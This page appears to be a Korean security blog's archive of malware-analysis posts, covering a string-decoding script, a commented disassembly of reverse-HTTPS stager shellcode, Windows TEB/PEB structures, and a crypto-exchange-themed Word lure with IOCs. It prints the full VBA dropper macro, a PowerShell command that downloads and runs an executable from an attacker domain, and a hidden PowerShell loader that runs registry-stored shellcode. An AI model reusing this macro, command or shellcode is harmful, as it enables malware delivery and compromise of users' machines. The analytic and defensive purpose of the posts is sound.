'분류 전체보기'에 해당되는 글 22건

reference : https://www.hauri.co.kr/security/security_view.html?intSeq=15&page=1&keyfield=&key=

#-*-coding:utf-8 -*-

import base64

def Operator(key):
    result = []
    OPkey = [0x28, 0x4, 0x20, 0x20]
    idx = 0
   
    for a in key:
        result.append(a + OPkey[idx])
        idx += 1

    return result

   
with open('str_info.txt', mode='rt') as f:
    result = f.read()
    result_list = result.split()
   
    for b64_encStr in result_list:
        b64_decStr = base64.b64decode(b64_encStr)
        data = b64_decStr[4:]
        key = b64_decStr[:4]
      
        result = ""

        if len(data)%4:
            for padding in range(4-len(data)%4):
                data += b"0"

        for dataSplit in zip(*[list(data[z::4]) for z in range(4)]):
            overflow = 0
            for index in range(4):
                if overflow:
                    key[index] = int(key[index])+int(overflow)
                    overflow = 0
                
                if key[index] > 255:
                    overflow  = int(str(hex(key[index]))[-3])
                    key[index] = int(str(hex(key[index]))[-2:], 16)
                    key[index] = int(key[index])
                    
                result += chr(dataSplit[index]^key[index])
            key = Operator(key)
            
        print(result)

; shellcode found on Windows host. Payload was stored in the registry. Powershell
; was used to extract it from the registry and execute it:
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \
; hidden -c "$val = (gp HKLM:SOFTWARE\'਀਀').'਀਀'; \
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d"

; The following references were used to help comment the shellcode
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/

    0x00080000:  cld     cld
    0x00080001:  call    0x8008f
    0x00080006:  pushal  pushal   ; 60
    0x00080007:  mov     ebp, esp ; 98 e5
    0x00080009:  xor     edx, edx ; 31 d2
    0x0008000B:  mov     edx, dword ptr fs:[edx + 0x30]
    0x0008000F:  mov     edx, dword ptr [edx + 0xc]
    0x00080012:  mov     edx, dword ptr [edx + 0x14]
    0x00080015:  mov     esi, dword ptr [edx + 0x28]
    0x00080018:  movzx   ecx, word ptr [edx + 0x26]
    0x0008001C:  xor     edi, edi
    0x0008001E:  xor     eax, eax
    0x00080020:  lodsb   al, byte ptr [esi]
    0x00080021:  cmp     al, 0x61
    0x00080023:  jl      0x80027
    0x00080025:  sub     al, 0x20
    0x00080027:  ror     edi, 0xd
    0x0008002A:  add     edi, eax
    0x0008002C:  loop    0x8001e
    0x0008002E:  push    edx
    0x0008002F:  push    edi
    0x00080030:  mov     edx, dword ptr [edx + 0x10]
    0x00080033:  mov     eax, dword ptr [edx + 0x3c]
    0x00080036:  add     eax, edx
    0x00080038:  mov     eax, dword ptr [eax + 0x78]
    0x0008003B:  test    eax, eax
    0x0008003D:  je      0x80089
    0x0008003F:  add     eax, edx
    0x00080041:  push    eax
    0x00080042:  mov     ecx, dword ptr [eax + 0x18]
    0x00080045:  mov     ebx, dword ptr [eax + 0x20]
    0x00080048:  add     ebx, edx
    0x0008004A:  jecxz   0x80088
    0x0008004C:  dec     ecx
    0x0008004D:  mov     esi, dword ptr [ebx + ecx*4]
    0x00080050:  add     esi, edx
    0x00080052:  xor     edi, edi
    0x00080054:  xor     eax, eax
    0x00080056:  lodsb   al, byte ptr [esi]
    0x00080057:  ror     edi, 0xd
    0x0008005A:  add     edi, eax
    0x0008005C:  cmp     al, ah
    0x0008005E:  jne     0x80054
    0x00080060:  add     edi, dword ptr [ebp - 8]
    0x00080063:  cmp     edi, dword ptr [ebp + 0x24]
    0x00080066:  jne     0x8004a
    0x00080068:  pop     eax
    0x00080069:  mov     ebx, dword ptr [eax + 0x24]
    0x0008006C:  add     ebx, edx
    0x0008006E:  mov     cx, word ptr [ebx + ecx*2]
    0x00080072:  mov     ebx, dword ptr [eax + 0x1c]
    0x00080075:  add     ebx, edx
    0x00080077:  mov     eax, dword ptr [ebx + ecx*4]
    0x0008007A:  add     eax, edx
    0x0008007C:  mov     dword ptr [esp + 0x24], eax
    0x00080080:  pop     ebx    ; 5b
    0x00080081:  pop     ebx    ; 5b
    0x00080082:  popal   popal  ; 61
    0x00080083:  pop     ecx    ; 59
    0x00080084:  pop     edx    ; 5a
    0x00080085:  push    ecx    ; 51
    0x00080086:  jmp     eax    ; ff e0
    0x00080088:  pop     eax    ; 58
    0x00080089:  pop     edi
    0x0008008A:  pop     edx
    0x0008008B:  mov     edx, dword ptr [edx]
    0x0008008D:  jmp     0x80015
    0x0008008F:  pop     ebp

; load wininet
    0x00080090:  push    0x74656e            ; Push the bytes 'wininet',0 onto the stack.
    0x00080095:  push    0x696e6977          ; ...
    0x0008009A:  push    esp                 ; Push a pointer to the "wininet" string on the stack.
    0x0008009B:  push    0x726774c           ; hash( "kernel32.dll", "LoadLibraryA" )
    0x000800A0:  call    ebp                 ; LoadLibraryA( "wininet" )
    0x000800A2:  call    0x80127

; user agent string - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; ASU2JS)

    ; INTERNETAPI_(HINTERNET) InternetOpenA(
    ;   LPCSTR lpszAgent,
    ;   DWORD  dwAccessType,
    ;   LPCSTR lpszProxy,
    ;   LPCSTR lpszProxyBypass,
    ;   DWORD  dwFlags);
    0x0008012C:  push    edi
    0x0008012D:  push    edi
    0x0008012E:  push    ecx
    0x0008012F:  push    0xa779563a      ; hash( "wininet.dll", "InternetOpenA" )
    0x00080134:  call    ebp

    0x00080136:  jmp     0x801ce

    ; void InternetConnectA(
    ;     HINTERNET     hInternet,
    ;     LPCSTR        lpszServerName,
    ;     INTERNET_PORT nServerPort,
    ;     LPCSTR        lpszUserName,
    ;     LPCSTR        lpszPassword,
    ;     DWORD         dwService,
    ;     DWORD         dwFlags,
    ;     DWORD_PTR     dwContext);
    0x0008013B:  pop     ebx             ; pop URL (hostname), store in ebx
    0x0008013C:  xor     ecx, ecx        ; NULL
    0x0008013E:  push    ecx             ; DWORD_PTR dwContext (NULL)
    0x0008013F:  push    ecx             ; dwFlags (NULL)
    0x00080140:  push    3               ; DWORD dwService (INTERNET_SERVICE_HTTP)
    0x00080142:  push    ecx             ; password (NULL)
    0x00080143:  push    ecx             ; username (NULL)
    0x00080144:  push    0x1bb           ; port 443
    0x00080149:  push    ebx             ; hostname
    0x0008014A:  push    eax             ; HINTERNET hInternet
    0x0008014B:  push    0xc69f8957      ; hash( "wininet.dll", "InternetConnectA" )
    0x00080150:  call    ebp
    0x00080152:  mov     ebx, eax        ; save hInternet

    0x00080154:  jmp     0x801d0

    ; INTERNETAPI_(HINTERNET) HttpOpenRequestA(
    ;   HINTERNET hConnect,
    ;   LPCSTR    lpszVerb,
    ;   LPCSTR    lpszObjectName,
    ;   LPCSTR    lpszVersion,
    ;   LPCSTR    lpszReferrer,
    ;   LPCSTR    *lplpszAcceptTypes,
    ;   DWORD     dwFlags,
    ;   DWORD_PTR dwContext);
    0x00080156:  pop     ecx
    0x00080157:  xor     edx, edx        ; NULL
    0x00080159:  push    edx             ; dwContext (NULL)
    0x0008015A:  push    0x84a03200      ; ( 0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
                                         ;   0x80000000 |        ; INTERNET_FLAG_RELOAD
                                         ;   0x04000000 |        ; INTERNET_NO_CACHE_WRITE
                                         ;   0x00800000 |        ; INTERNET_FLAG_SECURE
                                         ;   0x00200000 |        ; INTERNET_FLAG_NO_AUTO_REDIRECT
                                         ;   0x00001000 |        ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
                                         ;   0x00002000 |        ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
                                         ;   0x00000200          ; INTERNET_FLAG_NO_UI
    0x0008015F:  push    edx             ; accept types (NULL)
    0x00080160:  push    edx             ; referrer (NULL)
    0x00080161:  push    edx             ; version (NULL)
    0x00080162:  push    ecx             ; url
    0x00080163:  push    edx             ; method
    0x00080164:  push    eax             ; hConnection
    0x00080165:  push    0x3b2e55eb      ; hash( "wininet.dll", "HttpOpenRequestA" )
    0x0008016A:  call    ebp
    0x0008016C:  mov     esi, eax        ; hHttpRequest

    ; BOOLAPI InternetSetOptionA(
    ;   HINTERNET hInternet,
    ;   DWORD     dwOption,
    ;   LPVOID    lpBuffer,
    ;   DWORD     dwBufferLength);
    0x0008016E:  push    0x3380          ; 0x00002000 |        ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
                                         ; 0x00001000 |        ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
                                         ; 0x00000200 |        ; SECURITY_FLAG_IGNORE_WRONG_USAGE
                                         ; 0x00000100 |        ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
                                         ; 0x00000080          ; SECURITY_FLAG_IGNORE_REVOCATION
    0x00080173:  mov     eax, esp        ; move flags into eax

    0x00080175:  push    4               ; sizeof(dwFlags)
    0x00080177:  push    eax             ; &dwFlags
    0x00080178:  push    0x1f            ; DWORD dwOption (31 = INTERNET_OPTION_SECURITY_FLAGS)
    0x0008017A:  push    esi             ; hRequest
    0x0008017B:  push    0x869e4675      ; hash( "wininet.dll", "InternetSetOptionA" )
    0x00080180:  call    ebp

    ; BOOLAPI HttpSendRequestA(
    ;   HINTERNET hRequest,
    ;   LPCSTR    lpszHeaders,
    ;   DWORD     dwHeadersLength,
    ;   LPVOID    lpOptional,
    ;   DWORD     dwOptionalLength);
    0x00080182:  xor     edi, edi        ; NULL
    0x00080184:  push    edi             ; optional length
    0x00080185:  push    edi             ; optional
    0x00080186:  push    edi             ; dwHeadersLength
    0x00080187:  push    edi             ; headers
    0x00080188:  push    esi             ; hHttpRequest
    0x00080189:  push    0x7b18062d      ; hash( "wininet.dll", "HttpSendRequestA" )
    0x0008018E:  call    ebp
    0x00080190:  test    eax, eax        ; test for failure
    0x00080192:  je      0x801dc

    0x00080194:  xor     edi, edi
    0x00080196:  test    esi, esi
    0x00080198:  je      0x8019e
    0x0008019A:  mov     ecx, edi
    0x0008019C:  jmp     0x801a7
    0x0008019E:  push    0x5de2c5aa     ; hash( "kernel32.dll", "GetLastError" )
    0x000801A3:  call    ebp
    0x000801A5:  mov     ecx, eax
    0x000801A7:  push    0x315e2145     ; GetDesktopWindow
    0x000801AC:  call    ebp
    0x000801AE:  xor     edi, edi
    0x000801B0:  push    edi
    0x000801B1:  push    7
    0x000801B3:  push    ecx
    0x000801B4:  push    esi
    0x000801B5:  push    eax
    0x000801B6:  push    0xbe057b7      ; InternetErrorDlg
    0x000801BB:  call    ebp
    0x000801BD:  mov     edi, 0x2f00
    0x000801C2:  cmp     edi, eax
    0x000801C4:  jne     0x801ca
    0x000801C6:  mov     eax, ebx
    0x000801C8:  jmp     0x80154
    0x000801CA:  xor     edi, edi
    0x000801CC:  jmp     0x801e3
    0x000801CE:  jmp     0x80219
    0x000801D0:  call    0x80156
    0x000801D5:  das     das
    0x000801D6:  push    ebx
    0x000801D7:  outsw   dx, word ptr [esi]
    0x000801D9:  xor     al, 0
    0x000801DB:  add     byte ptr [eax - 0x10], ch
    0x000801DE:  mov     ch, 0xa2
    0x000801E0:  push    esi
    0x000801E1:  call    ebp

    0x000801E3:  push    0x40          ; PAGE_EXECUTE_READWRITE
    0x000801E5:  push    0x1000        ; MEM_COMMIT
    0x000801EA:  push    0x400000      ; Stage allocation (8Mb ought to do us)
    0x000801EF:  push    edi           ; NULL
    0x000801F0:  push    0xe553a458    ; hash( "kernel32.dll", "VirtualAlloc" )
    0x000801F5:  call    ebp           ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
    0x000801F7:  xchg    eax, ebx
    0x000801F8:  push    ebx
    0x000801F9:  push    ebx
    0x000801FA:  mov     edi, esp
    0x000801FC:  push    edi           ; &bytesRead
    0x000801FD:  push    0x2000        ; read length
    0x00080202:  push    ebx           ; buffer
    0x00080203:  push    esi           ; hRequest
    0x00080204:  push    0xe2899612    ; hash( "wininet.dll", "InternetReadFile" )
    0x00080209:  call    ebp
    0x0008020B:  test    eax, eax      ; download failed? (optional?)
    0x0008020D:  je      0x801dc       ; failure???
    0x0008020F:  mov     eax, dword ptr [edi]
    0x00080211:  add     ebx, eax      ; buffer += bytes_received
    0x00080213:  test    eax, eax      ; optional?
    0x00080215:  jne     0x801fc       ; download_more???
    0x00080217:  pop     eax           ; clear the temporary storage
    0x00080218:  ret     ret           ; dive into the stored stage address
    0x00080219:  call    0x8013b       ; InternetConnectA

url:
	; 0x0008021E: 61
	; url foobar.com

출처 : https://gist.github.com/jdferrell3/4db966da06f4fa77816a54d802aca0f8 

최근 분석한 샘플(링크)과 유사한 샘플 지속적으로 확인되어 쉘코드까지 전부 분석을 진행하였으며 쉘코드가 동작하는 과정에서 Process Environment Block (이하 PEB)에서 Kernel32.dll의 주소를 얻어와 DLL을 로드하고 파일을 추가로 받아오는 과정을 정리한다. (Windows 7 x64 기준으로 작성됨)

쉘코드가 동작하면 우선 2E008F에서 문자열 "wininet"과 추후 API를 찾기 위한 고유값을 저장 후 TIB+0x30 위치의 PEB 구조체에 접근한다. 이후 PEB_LDR_DATA에서 InMemoryOrderModuleList에서 BaseDllName을 읽어온다. 이는 LDR_DATA_TABLE_ENTRY 구조체의 포인터로 프로세스 모듈의 정보를 담고 있다. (참고) 

이후 DllBase 주소를 가져와 PE 헤더 정보를 파싱하고 Export Table 정보를 가져와 데이터가 있는지 확인하는 구간과 저장된 고유값을 계산하고 비교하는 구간 그리고 찾는 api가 확인될 경우 호출하는 구간으로 나누어져 있다. 내부에 포함된 모듈의 경우 windows7 기준으로 초기화된 순서에 따라 현재 프로세스 -> ntdll -> kernel32 ... 순으로 확인하며 처음으로 LoadLibrary를 찾아 wininet.dll를 추가로 로드한다. 다음은 API에 대한 고유값을 나타낸다

- 0x0726774C : LoadLibrary

- 0xA779563A : InternetOpenA

- 0xC69F8957 : InternetConnectA

- 0x3B2E55EB : HttpOpenRequestA

- 0x869E4675 : InternetSetOpentionA

- 0x7B18062D : HttpSendRequestA

- 0x5DE2C5AA : GetLastError

- 0x315E2145 : GetDeskTopWindow

- 0x0BE057B7 : InternetErrorDlg

- 0xE553A458 : VirtualAlloc

- 0xE2899612 : InternetReadFile

TIB structure

struct _TEB {
    0x000 _NT_TIB NtTib;
    0x01c void* EnvironmentPointer;
    0x020 _CLIENT_ID ClientId;
    0x028 void* ActiveRpcHandle;
    0x02c void* ThreadLocalStoragePointer;
    0x030 _PEB* ProcessEnvironmentBlock;  /* In WinNT (incl. Win 2K, XP, and Vista), the most significant bit of the PEB pointer is typically never set, because high memory addresses are reserved for the OS. */ </b>
    0x034 DWORD LastErrorValue;
    0x038 DWORD CountOfOwnedCriticalSections;
    0x03c void* CsrClientThread;
    0x040 void* Win32ThreadInfo;
    0x044 DWORD User32Reserved[26];
    0x0ac DWORD UserReserved[5];
    0x0c0 void* WOW32Reserved;
    0x0c4 DWORD CurrentLocale;
    0x0c8 DWORD FpSoftwareStatusRegister;
    0x0cc void* SystemReserved1[54];
    0x1a4 int ExceptionCode;
    0x1a8 _ACTIVATION_CONTEXT_STACK ActivationContextStack;
    0x1bc DWORD SpareBytes1[24];
    0x1d4 _GDI_TEB_BATCH GdiTebBatch;
    0x6b4 _CLIENT_ID RealClientId;
    0x6bc void* GdiCachedProcessHandle;
    0x6c0 DWORD GdiClientPID;
    0x6c4 DWORD GdiClientTID;
    0x6c8 void* GdiThreadLocalInfo;
    0x6cc DWORD Win32ClientInfo[62];
    0x7c4 void* glDispatchTable[233];
    0xb68 DWORD glReserved1[29];
    0xbdc void* glReserved2;
    0xbe0 void* glSectionInfo;
    0xbe4 void* glSection;
    0xbe8 void* glTable;
    0xbec void* glCurrentRC;
    0xbf0 void* glContext;
    0xbf4 DWORD LastStatusValue;
    0xbf8 _UNICODE_STRING StaticUnicodeString;
    0xc00 WORD StaticUnicodeBuffer[261];
    0xe0c void* DeallocationStack;
    0xe10 void* TlsSlots[64];
    0xf10 _LIST_ENTRY TlsLinks;
    0xf18 void* Vdm;
    0xf1c void* ReservedForNtRpc;
    0xf20 void* DbgSsReserved[2];
    0xf28 DWORD HardErrorsAreDisabled;
    0xf2c void* Instrumentation[16];
    0xf6c void* WinSockData;
    0xf70 DWORD GdiBatchCount;
    0xf74 UChar InDbgPrint;
    0xf75 UChar FreeStackOnTermination;
    0xf76 UChar HasFiberData;
    0xf77 UChar IdealProcessor;
    0xf78 DWORD Spare3;
    0xf7c void* ReservedForPerf;
    0xf80 void* ReservedForOle;
    0xf84 DWORD WaitingOnLoaderLock;
    0xf88 _Wx86ThreadState Wx86Thread;
    0xf94 void** TlsExpansionSlots;
    0xf98 DWORD ImpersonationLocale;
    0xf9c DWORD IsImpersonating;
    0xfa0 void* NlsCache;
    0xfa4 void* pShimData;
    0xfa8 DWORD HeapVirtualAffinity;
    0xfac void* CurrentTransactionHandle;
    0xfb0 _TEB_ACTIVE_FRAME* ActiveFrame;
};

PEB structure

struct _PEB {
    0x000 BYTE InheritedAddressSpace;
    0x001 BYTE ReadImageFileExecOptions;
    0x002 BYTE BeingDebugged;
    0x003 BYTE SpareBool;
    0x004 void* Mutant;
    0x008 void* ImageBaseAddress;
    0x00c _PEB_LDR_DATA* Ldr;
    0x010 _RTL_USER_PROCESS_PARAMETERS* ProcessParameters;
    0x014 void* SubSystemData;
    0x018 void* ProcessHeap;
    0x01c _RTL_CRITICAL_SECTION* FastPebLock;
    0x020 void* FastPebLockRoutine;
    0x024 void* FastPebUnlockRoutine;
    0x028 DWORD EnvironmentUpdateCount;
    0x02c void* KernelCallbackTable;
    0x030 DWORD SystemReserved[1];
    0x034 DWORD ExecuteOptions:2; // bit offset: 34, len=2
    0x034 DWORD SpareBits:30; // bit offset: 34, len=30
    0x038 _PEB_FREE_BLOCK* FreeList;
    0x03c DWORD TlsExpansionCounter;
    0x040 void* TlsBitmap;
    0x044 DWORD TlsBitmapBits[2];
    0x04c void* ReadOnlySharedMemoryBase;
    0x050 void* ReadOnlySharedMemoryHeap;
    0x054 void** ReadOnlyStaticServerData;
    0x058 void* AnsiCodePageData;
    0x05c void* OemCodePageData;
    0x060 void* UnicodeCaseTableData;
    0x064 DWORD NumberOfProcessors;
    0x068 DWORD NtGlobalFlag;
    0x070 _LARGE_INTEGER CriticalSectionTimeout;
    0x078 DWORD HeapSegmentReserve;
    0x07c DWORD HeapSegmentCommit;
    0x080 DWORD HeapDeCommitTotalFreeThreshold;
    0x084 DWORD HeapDeCommitFreeBlockThreshold;
    0x088 DWORD NumberOfHeaps;
    0x08c DWORD MaximumNumberOfHeaps;
    0x090 void** ProcessHeaps;
    0x094 void* GdiSharedHandleTable;
    0x098 void* ProcessStarterHelper;
    0x09c DWORD GdiDCAttributeList;
    0x0a0 void* LoaderLock;
    0x0a4 DWORD OSMajorVersion;
    0x0a8 DWORD OSMinorVersion;
    0x0ac WORD OSBuildNumber;
    0x0ae WORD OSCSDVersion;
    0x0b0 DWORD OSPlatformId;
    0x0b4 DWORD ImageSubsystem;
    0x0b8 DWORD ImageSubsystemMajorVersion;
    0x0bc DWORD ImageSubsystemMinorVersion;
    0x0c0 DWORD ImageProcessAffinityMask;
    0x0c4 DWORD GdiHandleBuffer[34];
    0x14c void (*PostProcessInitRoutine)();
    0x150 void* TlsExpansionBitmap;
    0x154 DWORD TlsExpansionBitmapBits[32];
    0x1d4 DWORD SessionId;
    0x1d8 _ULARGE_INTEGER AppCompatFlags;
    0x1e0 _ULARGE_INTEGER AppCompatFlagsUser;
    0x1e8 void* pShimData;
    0x1ec void* AppCompatInfo;
    0x1f0 _UNICODE_STRING CSDVersion;
    0x1f8 void* ActivationContextData;
    0x1fc void* ProcessAssemblyStorageMap;
    0x200 void* SystemDefaultActivationContextData;
    0x204 void* SystemAssemblyStorageMap;
    0x208 DWORD MinimumStackCommit;
);

PEB -> LDR_DATA

typedef struct _PEB_LDR_DATA
{
    0x00    ULONG         Length;                            /* Size of structure, used by ntdll.dll as structure version ID */
    0x04    BOOLEAN       Initialized;                       /* If set, loader data section for current process is initialized */
    0x08    PVOID         SsHandle;
    0x0c    LIST_ENTRY    InLoadOrderModuleList;             /* Pointer to LDR_DATA_TABLE_ENTRY structure. Previous and next module in load order */
    0x14    LIST_ENTRY    InMemoryOrderModuleList;           /* Pointer to LDR_DATA_TABLE_ENTRY structure. Previous and next module in memory placement order */
    0x1c    LIST_ENTRY    InInitializationOrderModuleList;   /* Pointer to LDR_DATA_TABLE_ENTRY structure. Previous and next module in initialization order */
} PEB_LDR_DATA,*PPEB_LDR_DATA; // +0x24

3월부터 토탈에서 지속적으로 코인거래소와 관련된 제목과 내용을 가지고 있는 문서가 확인되었다. 이 공격은 현재까지 지속적으로 이루어지고 있는 것으로 확인되며 유사한점이 많아 분석을 진행하였다. 

4월 10일에 마지막으로 수정되었으며 정상적인 워드 문서로 위장하고 있는 파일은 취약점을 악용하며  매크로 코드가 포함되어 있지않지만 추가로 다운로드 받은 파일(매크로 코드가 포함된 워드서식)에 의해 콘텐츠 사용버튼을 누름으로써 매크로 코드가 동작하게 된다.

매크로 코드는 추가 파일을 다운로드 받기 위해 시도하며 Powershell을 사용하여 동작시킨다.

Private Sub Document_Open()
myvba
End Sub

Private Sub myvba()
Dim shp As Shape

 
'Delete Shapes
For Each shp In ActiveDocument.Shapes
    shp.Delete
Next shp
    Dim str, str1, str2, str3, str4, str5, str6, str7, str8, str9, str10, str11, str12, str13, str14, str15
    str1 = "cm"
    str2 = "d /c powers"
    str3 = "hell w"
    str4 = "get -u"
    str5 = "ri "
    str6 = "https://down.mt3232.com/cs/"
    str7 = "log.txt"
    str8 = " -outfile C:\Users\Public\Documents\log.e"
    str9 = "xe;[System.Diagnostics.Pro"
    str10 = "cess]::St"
    str11 = "art('"
    str12 = "C:\Users\Public\Documents\log.e"
    str13 = "xe',"
    str14 = "'asijdoaj"
    str15 = "sid');"
    str = str1 & str2 & str3 & str4 & str5 & str6 & str7 & str8 & str9 & str10 & str11 & str12 & str13 & str14 & str15
    Set ws = CreateObject("WScr" & "ipt.Sh" & "ell")
    ws.Run str, 0, False

 
End Sub

cmd /c powershell wget -uri https://down.mt3232.com/cs/log.txt -outfile C:\Users\Public\Documents\log.exe;[System.Diagnostics.Process]::Start('C:\Users\Public\Documents\log.exe asijdoajsid');

받은 파일(log.exe)은 NHN의 서명을 가지고 있으며 4월13일자로 등록되어있다. 내부 리소스에는 2개의 파일이 포함되어있으며 정상적으로 동작할 경우 동일한 폴더에 각각 생성 후 스케줄러를 사용하여 동작시킨다.

생성파일 1. GoogleUpdate.exe (정상파일)

  - 스케줄러명 #1 : GoogleUpdate (매일 오전9시 동작)

  - 스케줄러명 #2 : GoogleUpdateOnce (5분 후)

생성파일 2. goopdate.dll (악성, UPX)

리소스파일은 DLL Side-Loading 이라는 기법을 사용하는 것으로 보인다. GoogleUpdate.exe 파일은 정상 구글업데이트 파일로 실행 시 goopdate.dll의 DllEntry 함수를 동작시키는 코드가 포함되어 있는데 공격자를 이를 악용하여 생성파일2(goopdate.dll)를 동작시킨다. 정상적으로 동작한 DLL파일은 정상적인 PC에서 동작하는 것인지 확인하기 위해 프로세서가 4 이상인지 확인 후 동작시킨다.

GoogleUpdate.exe에서 goopdate.dll를 찾아서 로드하여 DllEntry 함수를 실행하는 과정에서 DLL의 경로를 가져오며 그 값에서 +0x06에 위치한 데이터(0x55)를 쉘코드의 복호화 키로 사용한다. 쉘코드에서 통신하는 최종 C&C 서버는 코인거래소(빗썸)과 유사한 주소를 가지고 있으며 추가 바이너리를 받아와 복호화 후 메모리에 다시 로드하는 과정을 포함하고 있다.

번외로 최종 C&C서버는 동일하게 사용하며 코인원, 업비트 등등 다양한 형태의 문서로 위장하여 사용자에게 유포되고 있으며 log.txt파일은 NHN 서명을 계속 포함하고 있었다. 또한 log.txt 페이지는 정상적인 접근이 아니라면 리다이렉션 되도록 설정이 된듯한데 리다이렉션되는 페이지가 네이버로 되어있더라....

사전투표 미리하고 집에서 잉여처럼 지낼예정이였으나 어제는 논다고 바빠서 마무리를 못했지만 오늘이라도 올려본다

[IOC]

734618D96B0C73E2F36CDCCC3DE73F7A (새로운 방안입니다_1.docx)

84008911B1028EBDC1EC642051B21389 (word.dotm)

EBF2973E4CA3C86CC9DE396DF9137DAD (log.txt)

down.mt3232.com 
products.0ffice-microsoft.com 
cs.bit-humb.com

[유사샘플] 
16EC6973838186155689FCC9DDDF1FDA 
4738EF788DD7AA1C4CB774E217A9897E 
1007284d1267920766403c5657a1b9b4 
05D568E6CE9707795098D9DA70C474E5